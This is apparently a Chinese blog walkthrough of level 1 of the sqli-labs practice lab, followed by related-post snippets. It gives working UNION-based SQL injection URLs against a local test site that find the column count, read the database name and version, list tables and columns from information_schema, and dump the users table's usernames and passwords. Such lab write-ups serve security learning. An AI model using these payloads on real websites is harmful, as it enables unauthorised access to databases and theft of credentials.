SQL注入sqlilabs-master闯关-Less-1

已于 2023-09-14 17:31:00 修改
阅读量123 收藏
点赞数
文章标签: sql 数据库 web安全
于 2023-09-14 11:05:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/guzilili/article/details/132859790
版权

目录

一、判断注入类型:字符型

二、利用错误回显爆出字段数量

1、order by 的运用

三、测试回显位置

1、union 联合查询的运用

四、爆出当前数据库名称和数据库版本

五、爆出当前数据库所有表名

六、爆出user表的字段名

七、爆出users表的账户密码

一、判断注入类型:字符型

http://127.0.0.1/sqlilabs-master/Less-1/?id=1 传入参数id,返回正常

http://127.0.0.1/sqlilabs-master/Less-1/?id=2 传入参数id=2,返回正常,但页面不同

http://127.0.0.1/sqlilabs-master/Less-1/?id=1' 传入参数id=1'出错

以此判断类型为字符型注入,传入了错误参数1’

二、利用错误回显爆出字段数量

1、order by 的运用

http://127.0.0.1/sqlilabs-master/Less-1/?id=1' order by 3--+  返回正常(用--+将'闭合)

http://127.0.0.1/sqlilabs-master/Less-1/?id=1' order by 4--+ 返回错误 说明有三个字段(用--+将'闭合)

三、测试回显位置

1、union 联合查询的运用

http://127.0.0.1/sqlilabs-master/Less-1/?id=0' union select 1,2,3--+ 显示回显位为2,3

注意查询时前面的id不能有返回内容 可以用0或-1代替(传入一个错误id值)

四、爆出当前数据库名称和数据库版本

数据库名为security 版本为mysql5.7

http://127.0.0.1/sqlilabs-master/Less-1/?id=-1' union select 1,database(),version()--+

五、爆出当前数据库所有表名

http://127.0.0.1/sqlilabs-master/Less-1/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

 注意:如果不用group_concat连结 只返回一个查询结果

http://127.0.0.1/sqlilabs-master/Less-1/?id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database()--+

查询语句来源

证实:

六、爆出user表的字段名

http://127.0.0.1/sqlilabs-master/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name=”users”--+

查询语句来源

证实:

七、爆出users表的账户密码

http://127.0.0.1/sqlilabs-master/Less-1/?id=-1' union select 1,group_concat(username),group_concat(password) from users--+

注意:如果不用group_concat()将表中第一行的用户账户和密码

guzilili
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs之less1
giun的博客
01-05 344
在看别人的博客的基础上自己加了些修改 sql-labs之less1 打开题目我们可以看到这样的界面 一、我们先尝试下看是不是get获取请求方式。 在地址栏后面加上?id=1;发现结果是我们所预料的get方式。 http://127.0.0.1/sqli-labs-master/Less-1/?id=1 二、在http://127.0.0.1/sqli-labs-master/Less-1/?i...
sqli-labs-master Less-1
Risker
04-10 1075
提示提交id值,用单引号试一下,报错:猜测id值在查询语句中被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
Sqli-Labs:Less-1
weixin_44227437的博客
05-04 346
sqli-1 基于错误_GET_单引号_字符型注入 0x01:判断是字符型注入还是数字型注入
sqli-labs-master less-1---less-4
qq_44813849的博客
07-20 165
less-1 根据提示尝试输入一个id=1,能够看到数据 在1后面加一个 ’ ,开始报错 然后查看一下源代码和错误提示我们了解到,提交的sql中的 1’ 构造形成了’1’’ LIMIT 0,1 我们应该把后面的注释掉 所以在后面加一个 %23或–+ 接着使用order by 来对数据进行排序,我们可以从1开始测试或者使用均分法先从一个大的数据测,然后再分半。这一题测试过后只有三列,四就开...
SQL注入sqli-labs(less1-7)
冷冷的oO
04-24 3417
注:靶场基本上每一关的目标都是拿到数据库的用户名和密码。 Less-1 打开第一关看到如下页面,“Dhakkan”是印度俚语,意思是愚蠢的人,页面提示让我们输入ID值作为参数。
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室(Sqli Labs)代码仅适用于PHP5,而许多开发者现在正在使用PHP7。这引发了两个主要的知识点:PHP版本兼容性和SQL注入的防范。 ...
sqli-labs-master.zip sql注入的学习靶机
最新发布
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
sqli-labs-master.zip
03-17
SQL注入实战演练平台——SQL-labs学习指南》 SQL注入SQL Injection)是一种常见的网络安全漏洞,它允许攻击者通过输入恶意的SQL语句来控制或获取数据库中的敏感信息。SQL-labs是一个专为初学者设计的SQL注入...
Sqli-labs-master的环境搭建
m0_52505633的博客
04-10 2400
Sqli-libs是一位印度程序员写的,用来学习SQL注入的一个游戏教程。它是一个非常好的SQL注入学习实战平台,涵盖了报错注入、盲注、Update注入、Insert注入、Heather注入、二阶注入、绕过WAF,比较全面的一个注入平台。本次在phpstudy环境上部署sqli-labs 注入平台。 本次安装是在虚拟机中windows10安装 ----注释---- phpstudy和sqli-labs等学习环境、靶场、工具尽量安装在虚拟机中,以免某些设置、端口忘记关闭,会存在安全隐患,包括一些软件本.
【记录】sqli-labs-master搭建
weixin_30640769的博客
09-10 415
附上:链接:http://pan.baidu.com/s/1bpCRzl1 密码:ep48 下载完成后直接解压到phpstudy(该工具之前分享过,直接搜索下)的WWW目录下,启动phpstudy, 打开sqli-labs-master目录下sql-connections中的db-creds.inc文件,将$dbpass参数值修改为root。 访问http://127.0.0.1/sql...
SQL注入sqli-labs的Less1~10史上最详细通关教程
qq_49502930的博客
11-14 4663
SQL注入sqli-labs详细通关教程 首先需要准备好火狐浏览器(方便下载hackbar这个插件)还有phpstudy搭建,以及sqli-labs搭建。其次,我们需要有一定的数据库基本语句基础,通关时有必要的语句我会解释,也希望大家可以自己在网上查找学习相关语句。 下面展示一些 基本语句。 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables w
sql注入sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 587
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
如何下载sqli-labs-master并相关配置环境
weixin_44974935的博客
06-06 554
如何下载sqli-labs-master并相关配置环境 准备工作 首先下载完成下面的两个文件 下载sqli-labs-master 下载地址: 下载PHPstudy2018 下载地址: 然后安装好phpstudy2018,把下载好的sqli-labs-master拉入WWW目录 然后更改sqli-labs-master中的 ...
搭建SQL注入平台
分享与记录
03-06 3150
1.phpstudy或wamp 二者下载其一,我安装的是phpstudy2018。 2.下载sql-labs sql-labs是一款学习SQL注入的开源平台,共有75种不同类型的注入,这里提供一个我白嫖(滑稽)来的下载地址:https://github.com/Audi-1/sqli-labs 下载完压缩包后并解压到phpstudy2018网站的根目录(我电脑上的路径是L:\phpstudy\P...
Sqli-lab注入靶场安装部署
qq_42039946的博客
07-18 775
一、准备工作 1.1准备一台windows虚拟机,windows server或者windows系统均可,本文中使用win10系统 1.2.准备sqli-lab源文件,可以通过https://download.csdn.net/download/qq_42039946/20359906下载 或者通过gibhub下载 https://github.com/workcha/sqli-labs-master 1.3准备phpstudy,下载链接为: https://public.xp.cn/upg...
phpstudy环境搭建sqli-labs-master
Risker
04-10 3757
看到网上不少sql注入的帖子都是拿sqli-labs-master做练习和例子,想着搭建一个练习一下。php环境我是使用phpstudy,这里介绍phpstudy如何搭建sqli-labs-master。直接上链接(我就是从dalao博客搭的):点击打开链接搭建成功后每次启动phpstudy,访问http://127.0.0.1/sqli-labs-master/#fm_imagemap就可以做练...
Sqli-labs闯关详解带python脚本详解
westlife
10-24 3086
Sqli-labs-less1 *作为一个萌新小白,学了一段时间的python和web安全类的知识,打算写一点东西记录自己的成长。 尽量每一个关卡都利用python不同的风骚姿势。* ![shabi](https://img-blog.csdn.net/20181024192015475?watermark/2/text/aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl...
sqli-labs-master 闯关游戏
03-16
sqli-labs-master是一款用于学习SQL注入攻击技巧的闯关游戏,其中包含了若干关卡,每个关卡都涉及到了不同类型的SQL注入攻击。通过玩这个游戏,玩家可以学到如何识别和防御SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值